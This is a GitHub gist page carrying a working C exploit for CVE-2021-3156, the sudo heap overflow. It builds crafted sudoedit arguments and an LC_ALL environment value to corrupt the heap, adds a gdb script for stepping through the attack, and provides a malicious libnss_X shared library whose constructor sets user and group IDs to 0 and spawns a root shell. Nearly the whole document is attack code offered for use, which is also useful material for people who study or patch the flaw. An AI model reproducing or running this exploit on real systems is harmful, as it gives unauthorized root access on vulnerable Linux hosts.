Skip to content

Instantly share code, notes, and snippets.

Embed
What would you like to do?
CVE-2021-3156-exploit
#define _GNU_SOURCE
#include <stdio.h>
#include <unistd.h>
#include <string.h>
/*
author: swing @ bestswngs@gmail.com
swpwn-pd@ubuntu:~/glibc-2.31$ uname -a
Linux ubuntu 5.8.0-41-generic #46~20.04.1-Ubuntu SMP Mon Jan 18 17:52:23 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux
swpwn-pd@ubuntu:~/glibc-2.31$ cat /etc/issue
Ubuntu 20.04.1 LTS \n \l
*/
#define REP0(X)
#define REP1(X) X,
#define REP2(X) REP1(X) X,
#define REP3(X) REP2(X) X,
#define REP4(X) REP3(X) X,
#define REP5(X) REP4(X) X,
#define REP6(X) REP5(X) X,
#define REP7(X) REP6(X) X,
#define REP8(X) REP7(X) X,
#define REP9(X) REP8(X) X,
#define REP10(X) REP9(X) X,
#define REP100(X) \
REP10(X) REP10(X) REP10(X) REP10(X) REP10(X) \
REP10(X) REP10(X) REP10(X) REP10(X) REP10(X)
#define REP1000(X) \
REP100(X) REP100(X) REP100(X) REP100(X) REP100(X) \
REP100(X) REP100(X) REP100(X) REP100(X) REP100(X)
int main(){
int obufsz = 0x190;
char obuf[obufsz];
memset(obuf, 'B', sizeof(obuf));
obuf[obufsz-2] = 0x5c;
obuf[obufsz-1] = 0x00;
char env_cont[0x1000];
char env_val[0x1000];
int env_valsz = 0xd0;
memset(env_val,'Q',8);
memset(env_val+8,'A',env_valsz-8);
env_val[env_valsz] = '\0';
sprintf(env_cont,"LC_ALL=C.UTF-8@%s",env_val);
char *args[] = {
"/usr/bin/sudoedit",
"-s",
obuf,
"\\",
NULL
};
int PAD1SZ = 8;
char pad1[PAD1SZ] ;
memset(pad1, 'C', sizeof(pad1));
pad1[PAD1SZ-2]= 0x5c;
pad1[PAD1SZ-1]= 0x00;
char *extra_args[] = {
pad1,
REP1000("\\")
"AAA\\",
REP100("\\")
REP10("\\")
REP10("\\")
REP10("\\")
REP10("\\")
REP10("\\")
REP7("\\")
"X/X\\",
"a",
env_cont,
NULL,
};
execve(args[0], args, extra_args);
// execvpe("./sudoedit", args, extra_args);
}
# gcc CVE-2021-3156-exploit.c -o exploit
# gdb ./exploit -x gdbscript
catch exec
set breakpoint pending on
set follow-exec-mode new
r
b free if $r15==0xc && $r8==0
b __libc_dlopen_mode
#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
/*
mkdir libnss_X
gcc -Os -Wall -Wextra -fPIC -shared inject.c -o libnss_X/X.so.2
*/
static void __attribute__ ((constructor)) _init(void);
static void _init(void) {
printf("[+] getroot!\n");
setuid(0); seteuid(0); setgid(0); setegid(0);
static char *a_argv[] = { "sh", NULL };
static char *a_envp[] = { "PATH=/bin:/usr/bin:/sbin", NULL };
execv("/bin/sh", a_argv);
}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment